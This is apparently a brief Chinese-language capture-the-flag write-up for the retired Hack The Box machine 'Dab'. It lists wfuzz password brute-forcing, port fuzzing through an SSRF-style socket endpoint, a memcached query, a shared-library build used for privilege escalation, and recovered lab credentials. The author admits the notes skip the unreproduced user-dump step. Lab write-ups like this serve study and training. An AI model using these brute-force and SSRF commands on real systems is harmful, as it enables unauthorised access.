本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.86
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.86 -o ./Dab-autorecon
可能用到的知识点
进行模糊爆破密码 wfuzz -c --hl=18 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login admin:Password1 wfuzz -u http://10.10.10.86:8080/ -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt --hh 324 -b password=FUZZ secret 探测可能开放的端口 wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=bmfx' -H "Cookie: password=secret" --hc=500 login: genevieve password: Princess1 gcc -shared -fPIC /dev/shm/bmfx.c -o /dev/shm/libseclogin.so s3cur3l0g1n curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . 本靶机通过上述命令和burpsuite重放都没法获取用户名和加密的hash,原因未知,重置过靶机也是一样的情况,根据网上的资料直接跳过过程,拿去到flag,本靶机不做记录 参考: https://0xdf.gitlab.io/2019/02/02/htb-dab.html